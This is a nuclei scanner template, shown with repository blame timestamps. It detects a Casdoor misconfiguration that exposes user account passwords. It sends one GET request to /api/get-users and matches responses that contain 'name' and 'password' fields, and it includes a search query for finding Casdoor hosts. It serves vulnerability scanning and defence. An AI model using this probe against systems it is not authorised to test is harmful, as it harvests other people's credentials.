nuclei-templates/http/misconfiguration/casdoor-users-password.yaml

44 lines
1.3 KiB
YAML
Raw Normal View History

2023-08-06 13:16:28 +00:00
id: casdoor-users-password
info:
name: Casdoor get-users Account Password Disclosure
author: DhiyaneshDk
severity: high
2024-01-03 06:08:41 +00:00
description: Casdoor get-users Account Password is exposed.
2023-08-06 13:16:28 +00:00
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Casbin%20get-users%20%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md?plain=1
- https://github.com/qingchenhh/qc_poc/blob/main/Goby/Casbin_get_users.go
metadata:
verified: true
2023-10-14 11:27:55 +00:00
max-request: 1
2023-08-06 13:16:28 +00:00
fofa-query: title="Casdoor"
2024-09-10 08:22:50 +00:00
product: casdoor
vendor: casbin
2023-08-06 13:16:28 +00:00
tags: casdoor,exposure,misconfig,disclosure
2024-09-10 08:22:50 +00:00
classification:
cpe: cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:*
2023-08-06 13:16:28 +00:00
http:
- method: GET
path:
- "{{BaseURL}}/api/get-users?p=123&pageSize=123"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"name":'
- '"password":'
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
2024-09-10 08:22:50 +00:00
# digest: 490a00463044022057b135d11bf810e830e05881ffc3254f26c1436f37bcd9d9b4542bcde8755427022010d1ddee07bed42e9d2a7428aaeff2b6a8df455ea5f97e6b267b19cbc8889b20:922c64590222798bb761d5b6d8e72950